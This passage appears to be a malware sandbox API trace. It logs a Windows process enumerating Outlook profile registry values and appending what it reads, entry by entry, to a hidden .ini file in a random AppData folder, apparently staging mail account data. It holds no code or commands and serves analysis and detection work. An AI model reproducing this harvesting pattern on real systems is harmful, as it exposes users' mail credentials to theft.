FileInformationClass=0x5 | out: IoStatusBlock=0xdd68c, FileInformation=0xdd5e4) returned 0x0 [0236.391] NtWriteFile (in: FileHandle=0x144, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0xdd68c, Buffer=0x705c78*, Length=0x6, ByteOffset=0xdd5fc*=292, Key=0x0 | out: IoStatusBlock=0xdd68c, Buffer=0x705c78*) returned 0x0 [0236.392] NtClose (Handle=0x144) returned 0x0 [0236.393] NtEnumerateValueKey (in: KeyHandle=0x140, Index=0x5, KeyValueInformationClass=0x1, KeyValueInformation=0xdd77c, Length=0x400, ResultLength=0xde3d8 | out: KeyValueInformation=0xdd77c, ResultLength=0xde3d8) returned 0x0 [0236.393] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtPathName=0xdd684, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0236.393] NtCreateFile (in: FileHandle=0xdd6a4, DesiredAccess=0x12019f, ObjectAttributes=0xdd66c*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdd68c, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdd6a4*=0x144, IoStatusBlock=0xdd68c*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0236.393] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x706e80) returned 1 [0236.393] NtQueryInformationFile (in: FileHandle=0x144, IoStatusBlock=0xdd68c, FileInformation=0xdd5e4, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0xdd68c, FileInformation=0xdd5e4) returned 0x0 [0236.393] NtWriteFile (in: FileHandle=0x144, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0xdd68c, Buffer=0x705c78*, Length=0x1a, ByteOffset=0xdd5fc*=298, Key=0x0 | out: IoStatusBlock=0xdd68c, Buffer=0x705c78*) returned 0x0 [0236.394] NtClose (Handle=0x144) returned 0x0 [0236.395] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtPathName=0xdd684, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0236.395] NtCreateFile (in: FileHandle=0xdd6a4, DesiredAccess=0x12019f, ObjectAttributes=0xdd66c*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdd68c, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdd6a4*=0x144, IoStatusBlock=0xdd68c*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0236.395] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x706e80) returned 1 [0236.395] NtQueryInformationFile (in: FileHandle=0x144, IoStatusBlock=0xdd68c, FileInformation=0xdd5e4, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0xdd68c, FileInformation=0xdd5e4) returned 0x0 [0236.395] NtWriteFile (in: FileHandle=0x144, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0xdd68c, Buffer=0x705c78*, Length=0x2e, ByteOffset=0xdd5fc*=324, Key=0x0 | out: IoStatusBlock=0xdd68c, Buffer=0x705c78*) returned 0x0 [0236.395] NtClose (Handle=0x144) returned 0x0 [0236.400] NtEnumerateValueKey (in: KeyHandle=0x140, Index=0x6, KeyValueInformationClass=0x1, KeyValueInformation=0xdd77c, Length=0x400, ResultLength=0xde3d8 | out: KeyValueInformation=0xdd77c, ResultLength=0xde3d8) returned 0x0 [0236.400] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtPathName=0xdd684, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0236.401] NtCreateFile (in: FileHandle=0xdd6a4, DesiredAccess=0x12019f, ObjectAttributes=0xdd66c*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdd68c, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdd6a4*=0x144, IoStatusBlock=0xdd68c*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0236.401] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x706e80) returned 1 [0236.401] NtQueryInformationFile (in: FileHandle=0x144, IoStatusBlock=0xdd68c, FileInformation=0xdd5e4, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0xdd68c, FileInformation=0xdd5e4) returned 0x0 [0236.402] NtWriteFile (in: FileHandle=0x144, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0xdd68c, Buffer=0x705c78*, Length=0x20, ByteOffset=0xdd5fc*=370, Key=0x0 | out: IoStatusBlock=0xdd68c, Buffer=0x705c78*) returned 0x0 [0236.402] NtClose (Handle=0x144) returned 0x0 [0236.403] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtPathName=0xdd684, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0236.403] NtCreateFile (in: FileHandle=0xdd6a4, DesiredAccess=0x12019f, ObjectAttributes=0xdd66c*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdd68c, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdd6a4*=0x144, IoStatusBlock=0xdd68c*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0236.403] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x706e80) returned 1 [0236.403] NtQueryInformationFile (in: FileHandle=0x144, IoStatusBlock=0xdd68c, FileInformation=0xdd5e4, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0xdd68c, FileInformation=0xdd5e4) returned 0x0 [0236.403] NtWriteFile (in: FileHandle=0x144, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0xdd68c, Buffer=0x705c78*, Length=0x14, ByteOffset=0xdd5fc*=402, Key=0x0 | out: IoStatusBlock=0xdd68c, Buffer=0x705c78*) returned 0x0 [0236.404] NtClose (Handle=0x144) returned 0x0 [0236.405] NtEnumerateValueKey (in: KeyHandle=0x140, Index=0x7, KeyValueInformationClass=0x1, KeyValueInformation=0xdd77c, Length=0x400, ResultLength=0xde3d8 | out: KeyValueInformation=0xdd77c, ResultLength=0xde3d8) returned 0x8000001a [0236.405] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtPathName=0xdd71c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0236.405] NtCreateFile (in: FileHandle=0xdd73c, DesiredAccess=0x12019f, ObjectAttributes=0xdd704*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdd724, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdd73c*=0x144, IoStatusBlock=0xdd724*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0236.405] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x706e80) returned 1 [0236.405] NtQueryInformationFile (in: FileHandle=0x144, IoStatusBlock=0xdd724, FileInformation=0xdd67c, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0xdd724, FileInformation=0xdd67c) returned 0x0 [0236.406] NtWriteFile (in: FileHandle=0x144, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0xdd724, Buffer=0x705c78*, Length=0x4, ByteOffset=0xdd694*=422, Key=0x0 | out: IoStatusBlock=0xdd724, Buffer=0x705c78*) returned 0x0 [0236.406] NtClose (Handle=0x144) returned 0x0 [0236.407] NtClose (Handle=0x140) returned 0x0 [0236.407] NtEnumerateKey (in: KeyHandle=0x138, Index=0x1, KeyInformationClass=0x0, KeyInformation=0xddb7c, Length=0x400, ResultLength=0xde3d8 | out: KeyInformation=0xddb7c, ResultLength=0xde3d8) returned 0x0 [0236.407] NtCreateKey (in: KeyHandle=0xde3cc, DesiredAccess=0x20219, ObjectAttributes=0xdd734*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xde3cc*=0x140) returned 0x0 [0236.407] NtEnumerateValueKey (in: KeyHandle=0x140, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xdd77c, Length=0x400, ResultLength=0xde3d8 | out: KeyValueInformation=0xdd77c, ResultLength=0xde3d8) returned 0x0 [0236.407] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtPathName=0xdd684, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0236.408] NtCreateFile (in: FileHandle=0xdd6a4, DesiredAccess=0x12019f, ObjectAttributes=0xdd66c*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdd68c, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdd6a4*=0x144, IoStatusBlock=0xdd68c*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0236.413] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x706e80) returned 1 [0236.413] NtQueryInformationFile (in: FileHandle=0x144, IoStatusBlock=0xdd68c, FileInformation=0xdd5e4, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0xdd68c, FileInformation=0xdd5e4) returned 0x0 [0236.413] NtWriteFile (in: FileHandle=0x144, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0xdd68c, Buffer=0x705c78*, Length=0xc, ByteOffset=0xdd5fc*=426, Key=0x0 | out: IoStatusBlock=0xdd68c, Buffer=0x705c78*) returned 0x0 [0236.413] NtClose (Handle=0x144) returned 0x0 [0236.415] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtPathName=0xdd684, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0236.415] NtCreateFile (in: FileHandle=0xdd6a4, DesiredAccess=0x12019f, ObjectAttributes=0xdd66c*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdd68c, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdd6a4*=0x144, IoStatusBlock=0xdd68c*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0236.416] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x706e80) returned 1 [0236.416] NtQueryInformationFile (in: FileHandle=0x144, IoStatusBlock=0xdd68c, FileInformation=0xdd5e4, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0xdd68c, FileInformation=0xdd5e4) returned 0x0 [0236.416] NtWriteFile (in: FileHandle=0x144, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0xdd68c, Buffer=0x705c78*, Length=0x52, ByteOffset=0xdd5fc*=438, Key=0x0 | out: IoStatusBlock=0xdd68c, Buffer=0x705c78*) returned 0x0 [0236.416] NtClose (Handle=0x144) returned 0x0 [0236.422] NtEnumerateValueKey (in: KeyHandle=0x140, Index=0x1, KeyValueInformationClass=0x1, KeyValueInformation=0xdd77c, Length=0x400, ResultLength=0xde3d8 | out: KeyValueInformation=0xdd77c, ResultLength=0xde3d8) returned 0x0 [0236.422] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtPathName=0xdd684, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0236.422] NtCreateFile (in: FileHandle=0xdd6a4, DesiredAccess=0x12019f, ObjectAttributes=0xdd66c*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdd68c, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdd6a4*=0x144, IoStatusBlock=0xdd68c*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0236.422] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x706e80) returned 1 [0236.422] NtQueryInformationFile (in: FileHandle=0x144, IoStatusBlock=0xdd68c, FileInformation=0xdd5e4, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0xdd68c, FileInformation=0xdd5e4) returned 0x0 [0236.422] NtWriteFile (in: FileHandle=0x144, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0xdd68c, Buffer=0x705c78*, Length=0x12, ByteOffset=0xdd5fc*=520, Key=0x0 | out: IoStatusBlock=0xdd68c, Buffer=0x705c78*) returned 0x0 [0236.422] NtClose (Handle=0x144) returned 0x0 [0236.438] RtlIntegerToChar (in: Value=0xd84397d8, Base=0x0, Length=0x20, String=0xdd6e4 | out: String="3628308440") returned 0x0 [0236.438] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtPathName=0xdd684, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0236.438] NtCreateFile (in: FileHandle=0xdd6a4, DesiredAccess=0x12019f, ObjectAttributes=0xdd66c*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdd68c, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdd6a4*=0x144, IoStatusBlock=0xdd68c*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0236.447] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x706e80) returned 1 [0236.447] NtQueryInformationFile (in: FileHandle=0x144, IoStatusBlock=0xdd68c, FileInformation=0xdd5e4, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0xdd68c, FileInformation=0xdd5e4) returned 0x0 [0236.447] NtWriteFile (in: FileHandle=0x144, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0xdd68c, Buffer=0x705c78*, Length=0x18, ByteOffset=0xdd5fc*=538, Key=0x0 | out: IoStatusBlock=0xdd68c, Buffer=0x705c78*) returned 0x0 [0236.447] NtClose (Handle=0x144) returned 0x0 [0236.448] NtEnumerateValueKey (in: KeyHandle=0x140, Index=0x2, KeyValueInformationClass=0x1, KeyValueInformation=0xdd77c, Length=0x400, ResultLength=0xde3d8 | out: KeyValueInformation=0xdd77c, ResultLength=0xde3d8) returned 0x0 [0236.449] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtPathName=0xdd684, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0236.449] NtCreateFile (in: FileHandle=0xdd6a4, DesiredAccess=0x12019f, ObjectAttributes=0xdd66c*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdd68c, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdd6a4*=0x144, IoStatusBlock=0xdd68c*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0236.449] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x706e80) returned 1 [0236.449] NtQueryInformationFile (in: FileHandle=0x144, IoStatusBlock=0xdd68c, FileInformation=0xdd5e4, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0xdd68c, FileInformation=0xdd5e4) returned 0x0 [0236.449] NtWriteFile (in: FileHandle=0x144, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0xdd68c, Buffer=0x705c78*, Length=0x1a, ByteOffset=0xdd5fc*=562, Key=0x0 | out: IoStatusBlock=0xdd68c, Buffer=0x705c78*) returned 0x0 [0236.449] NtClose (Handle=0x144) returned 0x0 [0236.454] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtPathName=0xdd684, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0236.454] NtCreateFile (in: FileHandle=0xdd6a4, DesiredAccess=0x12019f, ObjectAttributes=0xdd66c*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdd68c, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdd6a4*=0x144, IoStatusBlock=0xdd68c*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0236.454] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x706e80) returned 1 [0236.454] NtQueryInformationFile (in: FileHandle=0x144, IoStatusBlock=0xdd68c, FileInformation=0xdd5e4, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0xdd68c, FileInformation=0xdd5e4) returned 0x0 [0236.454] NtWriteFile (in: FileHandle=0x144, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0xdd68c, Buffer=0x705c78*, Length=0x22, ByteOffset=0xdd5fc*=588, Key=0x0 | out: IoStatusBlock=0xdd68c, Buffer=0x705c78*) returned 0x0 [0236.454] NtClose (Handle=0x144) returned 0x0 [0236.456] NtEnumerateValueKey (in: KeyHandle=0x140, Index=0x3, KeyValueInformationClass=0x1, KeyValueInformation=0xdd77c, Length=0x400, ResultLength=0xde3d8 | out: KeyValueInformation=0xdd77c, ResultLength=0xde3d8) returned 0x0 [0236.456] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtPathName=0xdd684, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0236.456] NtCreateFile (in: FileHandle=0xdd6a4, DesiredAccess=0x12019f, ObjectAttributes=0xdd66c*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdd68c, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdd6a4*=0x144, IoStatusBlock=0xdd68c*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0236.456] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x706e80) returned 1 [0236.456] NtQueryInformationFile (in: FileHandle=0x144, IoStatusBlock=0xdd68c, FileInformation=0xdd5e4, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0xdd68c, FileInformation=0xdd5e4) returned 0x0 [0236.456] NtWriteFile (in: FileHandle=0x144, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0xdd68c, Buffer=0x705c78*, Length=0x1a, ByteOffset=0xdd5fc*=622, Key=0x0 | out: IoStatusBlock=0xdd68c, Buffer=0x705c78*) returned 0x0 [0236.456] NtClose (Handle=0x144) returned 0x0 [0236.457] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtPathName=0xdd684, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0236.457] NtCreateFile (in: FileHandle=0xdd6a4, DesiredAccess=0x12019f, ObjectAttributes=0xdd66c*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdd68c, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdd6a4*=0x144, IoStatusBlock=0xdd68c*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0236.458] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x706e80) returned 1 [0236.458] NtQueryInformationFile (in: FileHandle=0x144, IoStatusBlock=0xdd68c, FileInformation=0xdd5e4, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0xdd68c, FileInformation=0xdd5e4) returned 0x0 [0236.458] NtWriteFile (in: FileHandle=0x144, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0xdd68c, Buffer=0x705c78*, Length=0x14, ByteOffset=0xdd5fc*=648, Key=0x0 | out: IoStatusBlock=0xdd68c, Buffer=0x705c78*) returned 0x0 [0236.458] NtClose (Handle=0x144) returned 0x0 [0236.459] NtEnumerateValueKey (in: KeyHandle=0x140, Index=0x4, KeyValueInformationClass=0x1, KeyValueInformation=0xdd77c, Length=0x400, ResultLength=0xde3d8 | out: KeyValueInformation=0xdd77c, ResultLength=0xde3d8) returned 0x0 [0236.459] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtPathName=0xdd684, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0236.459] NtCreateFile (in: FileHandle=0xdd6a4, DesiredAccess=0x12019f, ObjectAttributes=0xdd66c*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdd68c, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdd6a4*=0x144, IoStatusBlock=0xdd68c*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0236.459] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x706e80) returned 1 [0236.459] NtQueryInformationFile (in: FileHandle=0x144, IoStatusBlock=0xdd68c, FileInformation=0xdd5e4, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0xdd68c, FileInformation=0xdd5e4) returned 0x0 [0236.459] NtWriteFile (in: FileHandle=0x144, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0xdd68c, Buffer=0x705c78*, Length=0xc, ByteOffset=0xdd5fc*=668, Key=0x0 | out: IoStatusBlock=0xdd68c, Buffer=0x705c78*) returned 0x0 [0236.459] NtClose (Handle=0x144) returned 0x0 [0236.460] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtPathName=0xdd684, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0236.460] NtCreateFile (in: FileHandle=0xdd6a4, DesiredAccess=0x12019f, ObjectAttributes=0xdd66c*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdd68c, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, 